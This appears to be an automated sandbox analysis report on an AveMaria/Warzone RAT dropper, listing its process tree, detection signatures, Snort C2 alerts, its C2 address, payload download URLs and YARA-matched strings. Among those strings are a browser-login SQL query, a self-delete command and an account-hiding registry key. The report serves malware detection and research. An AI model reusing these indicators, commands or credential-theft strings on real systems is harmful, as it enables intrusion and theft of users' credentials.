Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
Analysis ID:756122
MD5:373574c70ab6f299813fdafa9c12ab9b
SHA1:e6dbfbbe58f87e70da25f5cd31e526ddbceb679e
SHA256:ad8184627690f50da83d52fa3b92ed2597e279527821ffdede20240d19cc3e21
Tags:exe
Infos:

Detection

AveMaria
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected AveMaria stealer
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Contains functionality to hide user accounts
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe (PID: 5016 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe MD5: 373574C70AB6F299813FDAFA9C12AB9B)
    • powershell.exe (PID: 1328 cmdline: "powershell" Get-Date MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4168 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig/release MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • ipconfig.exe (PID: 1248 cmdline: ipconfig /release MD5: B0C7423D02A007461C850CD0DFE09318)
    • powershell.exe (PID: 2748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANAA1AA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5776 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig/renew MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • ipconfig.exe (PID: 6100 cmdline: ipconfig /renew MD5: B0C7423D02A007461C850CD0DFE09318)
  • cleanup
{"C2 url": "62.102.148.158", "port": 62641}
SourceRuleDescriptionAuthorStrings
00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
      00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_AveMaria_31d2bce9unknownunknown
      • 0x18e60:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
      • 0x17748:$a2: SMTP Password
      • 0x16988:$a3: select signon_realm, origin_url, username_value, password_value from logins
      • 0x18ce8:$a5: for /F "usebackq tokens=*" %%A in ("
      • 0x17178:$a6: \Torch\User Data\Default\Login Data
      • 0x17ce4:$a8: "os_crypt":{"encrypted_key":"
      • 0x17610:$a10: \logins.json
      • 0x17c5c:$a11: Accounts\Account.rec0
      • 0x18a88:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
      00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
          Click to see the 5 entries
          SourceRuleDescriptionAuthorStrings
          0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpackJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
            0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpackINDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOMDetects executables embedding command execution via IExecuteCommand COM objectditekSHen
            • 0x16f89:$r1: Classes\Folder\shell\open\command
            • 0x16fac:$k1: DelegateExecute
            0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpackMALWARE_Win_WarzoneRATDetects AveMaria/WarzoneRATditekSHen
            • 0x16554:$s1: RDPClip
            • 0x17358:$s2: Grabber
            • 0x16948:$s3: Ave_Maria Stealer OpenSource
            • 0x16a48:$s4: \MidgetPorn\workspace\MsgBox.exe
            • 0x1677e:$s5: @\cmd.exe
            0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpackAveMaria_WarZoneunknownunknown
            • 0x16d20:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
            • 0x16a74:$str2: MsgBox.exe
            • 0x16948:$str6: Ave_Maria
            • 0x15fe8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            • 0x15608:$str8: SMTP Password
            • 0x15fc0:$str12: \sqlmap.dll
            0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpackJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
              Click to see the 17 entries
              No Sigma rule has matched
              Timestamp:192.168.2.462.102.148.15849698626412852347 11/29/22-16:56:37.231932
              SID:2852347
              Source Port:49698
              Destination Port:62641
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:62.102.148.158192.168.2.462641496982852350 11/29/22-16:56:37.391216
              SID:2852350
              Source Port:62641
              Destination Port:49698
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.462.102.148.15849698626412852355 11/29/22-16:56:37.392528
              SID:2852355
              Source Port:49698
              Destination Port:62641
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.462.102.148.15849698626412852352 11/29/22-16:56:37.392528
              SID:2852352
              Source Port:49698
              Destination Port:62641
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.462.102.148.15849698626412839088 11/29/22-16:56:40.347271
              SID:2839088
              Source Port:49698
              Destination Port:62641
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:62.102.148.158192.168.2.462641496982852346 11/29/22-16:56:37.208383
              SID:2852346
              Source Port:62641
              Destination Port:49698
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.462.102.148.15849698626412839089 11/29/22-16:56:37.392528
              SID:2839089
              Source Port:49698
              Destination Port:62641
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.462.102.148.15849698626412852351 11/29/22-16:56:40.347271
              SID:2852351
              Source Port:49698
              Destination Port:62641
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:62.102.148.158192.168.2.462641496982852354 11/29/22-16:56:38.680309
              SID:2852354
              Source Port:62641
              Destination Port:49698
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeAvira: detected
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exeAvira: detection malicious, Label: TR/Dropper.Gen
              Source: C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exeReversingLabs: Detection: 37%
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exeJoe Sandbox ML: detected
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpackMalware Configuration Extractor: AveMaria {"C2 url": "62.102.148.158", "port": 62641}
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49696 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49697 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49701 version: TLS 1.2
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp

              Networking

              barindex
              Source: TrafficSnort IDS: 2852346 ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket 62.102.148.158:62641 -> 192.168.2.4:49698
              Source: TrafficSnort IDS: 2852347 ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse 192.168.2.4:49698 -> 62.102.148.158:62641
              Source: TrafficSnort IDS: 2852350 ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsCommand 62.102.148.158:62641 -> 192.168.2.4:49698
              Source: TrafficSnort IDS: 2852355 ETPRO TROJAN Ave Maria/Warzone RAT VNCGetModule 192.168.2.4:49698 -> 62.102.148.158:62641
              Source: TrafficSnort IDS: 2852352 ETPRO TROJAN Ave Maria/Warzone RAT DownloadAndExecuteCommand 192.168.2.4:49698 -> 62.102.148.158:62641
              Source: TrafficSnort IDS: 2839089 ETPRO TROJAN Ave Maria RAT Encrypted CnC Checkin (2) 192.168.2.4:49698 -> 62.102.148.158:62641
              Source: TrafficSnort IDS: 2852354 ETPRO TROJAN Ave Maria/Warzone RAT RemoteModuleLoadResponse 62.102.148.158:62641 -> 192.168.2.4:49698
              Source: TrafficSnort IDS: 2839088 ETPRO TROJAN Ave Maria RAT Encrypted CnC KeepAlive Outbound (2) 192.168.2.4:49698 -> 62.102.148.158:62641
              Source: TrafficSnort IDS: 2852351 ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsResponse 192.168.2.4:49698 -> 62.102.148.158:62641
              Source: Malware configuration extractorURLs: 62.102.148.158
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global trafficHTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /storage/download/1tQUp1sCtsBK HTTP/1.1Host: s23.filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /storage/download/EmFT04AdCdjg HTTP/1.1Host: s23.filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
              Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: powershell.exe, 00000001.00000003.358114104.00000000035E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581434532.00000000024E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://filetransfer.io
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Mqombsglp.exe.0.drString found in binary or memory: http://filetransfer.io/data-package/XK4aNvBX/download
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.583673856.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
              Source: powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581434532.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.426684299.0000000004DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000003.421845130.00000000081D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581666022.0000000002516000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/XK4aNvBX/download
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581666022.0000000002516000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io4
              Source: powershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
              Source: powershell.exe, 00000001.00000002.445374191.000000000561F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581841256.0000000002541000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581861359.0000000002545000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s23.filetransfer.io/storage/download/1tQUp1sCtsBK
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581861359.0000000002545000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s23.filetransfer.io4
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.591838998.0000000007200000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.591838998.0000000007200000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
              Source: unknownDNS traffic detected: queries for: filetransfer.io
              Source: global trafficHTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /storage/download/1tQUp1sCtsBK HTTP/1.1Host: s23.filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /storage/download/EmFT04AdCdjg HTTP/1.1Host: s23.filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49696 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49697 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49701 version: TLS 1.2
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputData

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
              Source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
              Source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
              Source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
